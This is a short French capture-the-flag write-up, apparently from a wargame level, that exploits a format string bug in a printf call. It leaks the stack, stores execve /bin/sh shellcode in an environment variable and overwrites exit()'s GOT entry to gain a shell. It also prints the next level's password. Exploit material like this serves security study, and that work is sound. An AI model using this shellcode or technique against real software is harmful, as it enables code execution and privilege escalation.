Il y a un appel fgets (), stocké dans l'entrée sur un buffer de 100 caractères. Une boucle sur le buffer pour transformer l'entrée en minuscules.
A la fin, il y a un appel à printf() avec le buffer comme paramètre, c'est une chaîne de charactere.

Essayons: 
python -c 'print "BBBB"+"-%x"*12' | ./level05 
bbbb-64-f7fcfac0-f7ec3af9-ffffd5ff-ffffd5fe-0-ffffffff-ffffd684-f7fdb000-62626262-2d78252d-252d7825

Ca fonctionne et notre string "BBBB" = "62626262" est à la 10ème position.

Pour l'exploiter, on peut stocker un shellcode dans une variable env et l'injecter en 10ème position avec la chaîne de caractere.

env -i CRACK=$(python -c 'print "\x90"*1000+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"') gdb level05
(gdb) b *main
(gdb) r
(gdb) x/200s environ
-> 0xffffdc59 

Il nous faut maintenant l'adresse de exit() pour overwrite la GOT.

(gdb) info function exit
-> 0x80497e0

On doit écrire dans l'adresse GOT en 2 fois car 0xffffdb9f = 4294957983 ce qui est trop long pour l'écrire en une fois.

dc59 = 56409 - 8 pour les 2 adresses d'avant -> 56401
ffff = 65535 - tout les caractères d'avant (56409) -> 9126

(python -c 'print "\xe0\x97\x04\x08"+"\xe2\x97\x04\x08"+"%56401d"+"%10$hn"+"%9126d"+"%11$hn"';cat) | env -i CRACK=$(python -c 'print "\x90"*1000+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"') ./level05
whoami
level06
cat ~level06/.pass
h4GtNnaMs2kZFN92ymTr2DcJHAzMfzLW25Ep59mq